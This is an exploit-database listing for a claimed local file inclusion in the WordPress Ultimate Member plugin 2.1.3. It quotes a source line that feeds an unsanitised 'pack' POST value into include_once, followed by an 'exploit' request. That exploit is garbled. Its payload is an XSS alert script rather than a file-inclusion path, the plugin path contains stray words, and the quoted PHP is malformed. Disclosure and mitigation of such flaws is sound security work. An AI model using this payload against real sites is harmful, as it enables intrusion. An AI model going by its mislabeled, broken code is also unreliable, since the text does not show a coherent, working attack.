header-logo
Suggest Exploit
vendor:
Ultimate Member
by:
mehran feizi
8.8
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Ultimate Member
Affected Version From: 2.1.3
Affected Version To: 2.1.3
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:ultimate_member:2.1.3
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

WordPress Plugin ultimate-member 2.1.3 – Local File Inclusion

An attacker can exploit this vulnerability by sending a crafted POST request to the vulnerable page with a malicious payload in the 'pack' parameter. This will allow the attacker to include a malicious file from the local system.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in any file operations.
Source

Exploit-DB raw data:

# Title  : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
# Author : mehran feizi
# Vendor : https://wordpress.org/plugins/ultimate-member/
# Category : Webapps
# Date : 2020-02-11
# Vendor home page: https://wordpress.org/plugins/ultimate-member/

Vulnerable Page:
/class-admin-upgrade.php


Vulnerable Source:
354: if(empty($_POST['pack'])) else
356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';


Exploit:
localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php
$_POST('pack')=<script>alert('xss')</script>